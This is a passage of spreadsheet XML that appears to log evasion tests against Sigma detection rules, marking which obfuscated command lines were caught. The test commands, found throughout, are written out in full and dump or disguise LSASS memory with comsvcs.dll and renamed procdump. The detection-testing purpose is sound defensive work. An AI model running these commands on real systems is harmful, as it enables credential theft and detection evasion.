          <t>Potentially Suspicious CMD Shell Output Redirect (8e0bb260-d4b2-4fff-bb8d-3f82118e6892); Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d); Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J356" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K356" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="357" ht="15.75" customHeight="1" s="42">
      <c r="A357" s="43" t="n"/>
      <c r="B357" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C357" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D357" s="44" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E357" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Temp enamed_file.dll, MiniDump &lt;PID&gt; C:\Temp\dump.bin full</t>
        </is>
      </c>
      <c r="F357" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G357" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H357" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I357" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious CMD Shell Output Redirect (8e0bb260-d4b2-4fff-bb8d-3f82118e6892); Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d)</t>
        </is>
      </c>
      <c r="J357" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K357" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="358" ht="15.75" customHeight="1" s="42">
      <c r="A358" s="43" t="n"/>
      <c r="B358" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C358" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D358" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E358" s="44" t="inlineStr">
        <is>
          <t>robocopy C:\Sysinternals C:\temp procdump.exe</t>
        </is>
      </c>
      <c r="F358" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G358" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H358" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I358" s="43" t="n"/>
      <c r="J358" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K358" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="359" ht="15.75" customHeight="1" s="42">
      <c r="A359" s="43" t="n"/>
      <c r="B359" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C359" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D359" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E359" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c ren procdump.exe pd.exe</t>
        </is>
      </c>
      <c r="F359" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G359" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H359" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I359" s="44" t="n"/>
      <c r="J359" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K359" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="360" ht="15.75" customHeight="1" s="42">
      <c r="A360" s="43" t="n"/>
      <c r="B360" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C360" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D360" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E360" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" c^opy procdump64.exe C:\temp\svchost.exe</t>
        </is>
      </c>
      <c r="F360" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G360" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H360" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I360" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J360" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K360" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="361" ht="15.75" customHeight="1" s="42">
      <c r="A361" s="43" t="n"/>
      <c r="B361" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C361" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D361" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E361" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" c^opy procdump64.exe C:\temp\svchost.exe</t>
        </is>
      </c>
      <c r="F361" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G361" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H361" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I361" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J361" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K361" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="362" ht="15.75" customHeight="1" s="42">
      <c r="A362" s="43" t="n"/>
      <c r="B362" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C362" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D362" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E362" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C c^opy procdump64.exe C:\temp\svchost.exe</t>
        </is>
      </c>
      <c r="F362" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G362" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H362" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I362" s="43" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J362" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K362" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="363" ht="15.75" customHeight="1" s="42">
      <c r="A363" s="43" t="n"/>
      <c r="B363" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C363" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D363" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E363" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c type lsass.exe_220512_103022.dmp &gt; C:\temp\out.bin</t>
        </is>
      </c>
      <c r="F363" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G363" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H363" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I363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363" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K363" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="364" ht="15.75" customHeight="1" s="42">
      <c r="A364" s="43" t="n"/>
      <c r="B364" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C364" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D364" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E364" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C type lsass.exe_220512_103022.dmp &gt; C:\temp\out.bin</t>
        </is>
      </c>
      <c r="F364" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G364" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H364" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I364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364" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K364" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="365" ht="15.75" customHeight="1" s="42">
      <c r="A365" s="43" t="n"/>
      <c r="B365" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C365" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D365" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E365" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" type lsass.exe_220512_103022.dmp &gt; C:\temp\out.bin</t>
        </is>
      </c>
      <c r="F365" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G365" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H365" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I365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365" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K365" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="366" ht="15.75" customHeight="1" s="42">
      <c r="A366" s="43" t="n"/>
      <c r="B366" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C366" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D366" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E366" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" type lsass.exe_220512_103022.dmp &gt; C:\temp\out.bin</t>
        </is>
      </c>
      <c r="F366" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G366" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H366" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I366" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potentially Suspicious CMD Shell Output Redirect (8e0bb260-d4b2-4fff-bb8d-3f82118e6892)</t>
        </is>
      </c>
      <c r="J366" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K366" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="367" ht="15.75" customHeight="1" s="42">
      <c r="A367" s="43" t="n"/>
      <c r="B367" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C367" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D367" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E367" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F367" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G367" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H367" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I367" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J367" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K367" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="368" ht="15.75" customHeight="1" s="42">
      <c r="A368" s="43" t="n"/>
      <c r="B368" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C368" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D368" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E368" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F368" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G368" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H368" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I368" s="44" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J368" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K368" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="369" ht="15.75" customHeight="1" s="42">
      <c r="A369" s="43" t="n"/>
      <c r="B369" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C369" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D369" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E369" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F369" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G369" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H369" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I369" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J369" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K369" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="370" ht="15.75" customHeight="1" s="42">
      <c r="A370" s="43" t="n"/>
      <c r="B370" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C370" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D370" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E370" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commAND "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F370" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G370" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H370" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I370" s="44" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J370" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K370" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="371" ht="15.75" customHeight="1" s="42">
      <c r="A371" s="43" t="n"/>
      <c r="B371" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C371" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D371" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E371" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAND "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F371" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G371" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H371" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I371" s="44" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J371" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K371" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="372" ht="15.75" customHeight="1" s="42">
      <c r="A372" s="43" t="n"/>
      <c r="B372" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C372" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D372" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E372" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F372" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G372" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H372" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I372" s="44" t="n"/>
      <c r="J372" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K372" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="373" ht="15.75" customHeight="1" s="42">
      <c r="A373" s="43" t="n"/>
      <c r="B373" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C373" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D373" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E373" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F373" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G373" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H373" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I373" s="43" t="n"/>
      <c r="J373" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K373" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="374" ht="15.75" customHeight="1" s="42">
      <c r="A374" s="43" t="n"/>
      <c r="B374" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C374" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D374" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E374" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAND "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F374" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G374" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H374" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I374" s="43" t="n"/>
      <c r="J374" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K374" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="375" ht="15.75" customHeight="1" s="42">
      <c r="A375" s="43" t="n"/>
      <c r="B375" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C375" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D375" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E375" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F375" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G375" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H375" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I375" s="44" t="n"/>
      <c r="J375" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K375" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="376" ht="15.75" customHeight="1" s="42">
      <c r="A376" s="43" t="n"/>
      <c r="B376" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C376" s="43" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D376" s="43" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E376" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAND "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F376" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G376" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H376" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I376" s="43" t="n"/>
      <c r="J376" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K376" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="377" ht="15.75" customHeight="1" s="42">
      <c r="A377" s="44" t="n"/>
      <c r="B377" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C377" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D377" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E377" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F377" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G377" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H377" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I377" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J377" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K377" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="378" ht="15.75" customHeight="1" s="42">
      <c r="A378" s="43" t="n"/>
      <c r="B378" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C378" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D378" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E378" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmANd "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F378" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G378" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H378" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I378" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J378" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K378" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="379" ht="15.75" customHeight="1" s="42">
      <c r="A379" s="43" t="n"/>
      <c r="B379" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C379" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D379" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E379" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F379" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G379" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H379" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I379" s="44" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J379" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K379" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="380" ht="15.75" customHeight="1" s="42">
      <c r="A380" s="43" t="n"/>
      <c r="B380" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C380" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D380" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E380" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F380" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G380" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H380" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I380" s="44" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J380" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K380" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="381" ht="15.75" customHeight="1" s="42">
      <c r="A381" s="43" t="n"/>
      <c r="B381" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C381" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D381" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E381" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMaND "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F381" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G381" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H381" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I381" s="44" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J381" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K381" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="382" ht="15.75" customHeight="1" s="42">
      <c r="A382" s="43" t="n"/>
      <c r="B382" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_lsass</t>
        </is>
      </c>
      <c r="C382" s="44" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump</t>
        </is>
      </c>
      <c r="D382" s="44" t="inlineStr">
        <is>
          <t>5afee48e-67dd-4e03-a783-f74259dcf998</t>
        </is>
      </c>
      <c r="E382" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" procdump.exe -m^a l^sass.exe C:\temp\dump.bin</t>
        </is>
      </c>
      <c r="F382" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G382" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H382" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I382" s="44" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump (5afee48e-67dd-4e03-a783-f74259dcf998)</t>
        </is>
      </c>
      <c r="J382" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K382" s="44" t="b">
